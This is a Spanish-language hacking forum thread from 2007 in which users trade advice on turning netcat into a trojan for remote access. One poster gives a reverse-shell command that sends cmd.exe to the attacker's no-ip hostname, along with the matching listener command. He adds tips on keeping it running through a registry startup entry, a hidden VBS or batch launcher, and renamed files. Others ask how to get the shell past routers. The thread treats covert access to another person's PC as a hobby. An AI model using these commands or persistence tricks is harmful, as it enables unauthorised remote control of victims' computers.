Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 1 Visitante están viendo este tema.

@ron

Cita de: D4RIO en 11 Agosto 2007, 20:41 PM
Respondiendo a @ron:
no-ip.org es un servicio de DNS. Eso significa que es un proveedor de nombres de dominio. Vos tenes una cuenta en no-ip y ellos asocian tu última IP a un nombre de subdominio que es por ejemplo, en mi caso, darioweb.no-ip.org.

El servicio funciona por dos partes. El servidor que provee el servicio de DNS y el cliente, o sea vos. Tu programa cliente de no-ip provee al servidor de tu última IP para que así ese subdominio DNS se asigne a ella. Así para cualquier cosa que necesites tu IP podés usar el DNS, sea un servidor web o tomar una shell.

Entonces si instalas el cliente de no-ip en otra PC y accedes los datos de tu cuenta de no-ip la IP a la que se asignará el DNS será la de la otra PC. Así es que podés usar cualquier PC para tomar una misma shell.

Y si querés hacer una conexión para ambos lados????  Es simple. Usas netcat para mandarte el IP de la otra persona por E-Mail !!!!!!  XD


y puedo poner en el regisro, q netcat se conecte a un direccion dns, como lo pondria?? y yo solo tendria q poner netcat a la escucha y abrir mi no-ip cambiar la direccion ip de mi duc mas reciente q seria de la q estaria usando actualmente y se conectaria, y ya esta y funcionaria??

D4RIO

A ver, en el equipo remoto ponés la conexión a tu máquina con

nc -d -e cmd.exe tu.dns 80

Y en tu máquina escuchas en el ochenta very verbose así:

nc -vv -L -p 80


y nada más, ya está...Si querés que se conecte a tu máquina siempre metés en el registro una entrada a un temporizador hecho en batch o lo que quieras...el resto es imaginación, ocultas las cosas, renombras y todo eso...Leete el post así no repetimos cosas que ya se dijeron :xD

Bye!
OpenBSDFreeBSD

@ron

una ultima duda nc -d -e cmd.exe tu.dns 80 , eso puedo ponerlo en el regisro o solamente cuando abra netcat??

hoy intente hacer una shell usado el puerto 6000 pero no podia usar el comando dir lo unico q pasaba esq cuando escribia algo en nc aparesia en el de el y viceversa, tambien lo intente usando los puertos 25 y 80 y ocurria lo mismo, cual podria ser el problema??

D4RIO

eso de nc -d -e cmd.exe tu.dns 80 especifica que la conexión es por el puerto 80, para que sea por el 6000 deberías cambiarlo.

No se si puedas ponerlo así en el registro, a parte no uso windows  :xD Pero podés poner una entrada en alguna rama de inicio que llame a un vbs que ejecute escondidito el comando del nc...o bien si no lo queres esconder pones en el registro la llamada a un batch.

Las posibilidades son muchísimas y te va a ser más provechoso "jugar" como dice yan...o sea...probá y probá! Yo hice un monton de pavadas con netcat, pero es cosa de sentarse y probar, tener un poco de imaginación y un montón de tiempo al cuete  ;D

Bueno, feliz hacking
OpenBSDFreeBSD

@ron

D4RIO

ps gracias por la paciencia y la informacion usare mi imaginacion y aver q pasa y aversi logro poder poner en practica lo q se asta ahora.

saludos, e igual, feliz hacking!!

culjar

Buenas a todos!! soy  nuevo en el foro y me llama bastante la atencion esto de poder troyanizar el netcat, pero sin embargo tengo un problema, y es que no soy capaz de hacerlo funcionar.
El problema viene porque mi pc está tras una Lan controlada por un router wifi, de manera q cuando especifico mi IP en el netcat pongo la pública que me ofrece mi proveedor de internet y parece q este es el problema ya que si pongo la del localhost siq me funciona perfectamente.
Espero que me puedan ayudar...y no estaría nada mal saber como se utiliza el type como pone en la primera pagina del post  ;D

Un saludo a todos.

@ron

Cita de: culjar en 16 Agosto 2007, 18:35 PM
Buenas a todos!! soy  nuevo en el foro y me llama bastante la atencion esto de poder troyanizar el netcat, pero sin embargo tengo un problema, y es que no soy capaz de hacerlo funcionar.
El problema viene porque mi pc está tras una Lan controlada por un router wifi, de manera q cuando especifico mi IP en el netcat pongo la pública que me ofrece mi proveedor de internet y parece q este es el problema ya que si pongo la del localhost siq me funciona perfectamente.
Espero que me puedan ayudar...y no estaría nada mal saber como se utiliza el type como pone en la primera pagina del post  ;D

Un saludo a todos.

yo te recomiendo que mejor agas que se conecte a una direccion dns y asla con no-ip lee mas sobre no-ip y veras que te puede funcionar, asla pruba y dinos si te funciona!!


saludos!

D4RIO

Si el problema en éste caso es el router fijate cómo está configurado y si tenés los puertos que usas habilitados.

En el tema creo que ya se habló sobre eso.
OpenBSDFreeBSD

culjar

Pues la cosa sigue sin funcionar. Lo de no-ip ya lo habia probado pero eso no tenia muxo q ver con el problema porque al fin y al cabo lo probe con la IP que me da mi ISP de internet que es mas o menos lo mismo.
En cuanto al router "creo" que tengo todo bien configurado y los puertos correspondientes abiertos aunque de todos modos uso el puerto 80 que se supone viene abierto por defecto.
No se me ocurre que mas hacer, asi que se admiten sugerencias de todo tipo.

Gracias de antemano!

@ron

creo q si pones el de ISP no se conecta a la pc esacta q tu quieres por eso te recomiendo q mejor la no-ip, si usas la de tu pc dentro de la lan el usar netcat para hacer una shell funcionara siempre y cuando lo intentes hacer dentro de la lan o wlan si lo q quiere es usarla fuera de tu red usa la no-ip o pon a la escucha y no en tu pc si no en la otra un minuto en el registro y as las modificaciones.


no se si me exlpique bien, y si no ps aqui estoy!!